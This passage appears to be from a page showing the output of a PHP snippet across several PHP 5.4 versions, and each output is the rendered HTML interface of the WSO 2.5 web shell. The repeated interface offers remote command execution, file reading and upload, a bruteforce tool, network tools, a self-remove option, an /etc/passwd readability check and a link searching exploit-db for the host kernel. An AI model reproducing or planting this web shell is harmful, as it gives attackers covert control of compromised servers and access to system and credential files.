value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.28
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.28 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.27
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.27 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.26
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.26 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.25
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.25 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.24
